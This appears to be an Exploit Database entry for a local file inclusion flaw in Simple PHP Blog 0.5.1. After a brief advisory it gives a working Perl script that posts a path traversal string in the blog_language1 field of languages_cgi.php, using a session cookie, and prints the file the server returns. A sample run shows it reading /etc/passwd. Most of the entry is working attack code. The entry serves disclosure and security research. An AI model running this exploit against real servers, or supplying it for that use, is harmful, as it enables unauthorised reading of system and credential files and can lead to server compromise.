# Title: Simple PHP Blog v0.5.1 Local File Inclusion Vulnerability
# EDB-ID: 10604
# CVE-ID: ()
# OSVDB-ID: ()
# Author: jgaliana
# Published: 2009-12-22
# Verified: no
# Download

Exploit Code

# Download N/A

view source
print?
# Simple PHP Blog is prone to a local file-include vulnerability because it fails to properly
# sanitize user-supplied input.

#An attacker can exploit this vulnerability to obtain potentially sensitive information or to #execute arbitrary local scripts in the context of the webserver process. This may allow the #attacker to compromise the application and the underlying computer; other attacks are also #possible.

# Simple PHP Blog 0.5.1 is vulnerable; other versions may also be affected.

#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana isecauditors=dot=com
# Internet Security Auditors

use LWP::UserAgent;

if ($#ARGV < 3) { die("Usage: $0 "); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
"http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]");
my $res = $ua->request($req);

if ($res->is_success) {
print $res->content;
} else {
print "Error: " .$res->status_line, "\n";
}

#$ perl simple.pl example.com /blog /etc/passwd |head -1
#root:*:0:0:root:/root:/bin/bash

from :

Offensive Security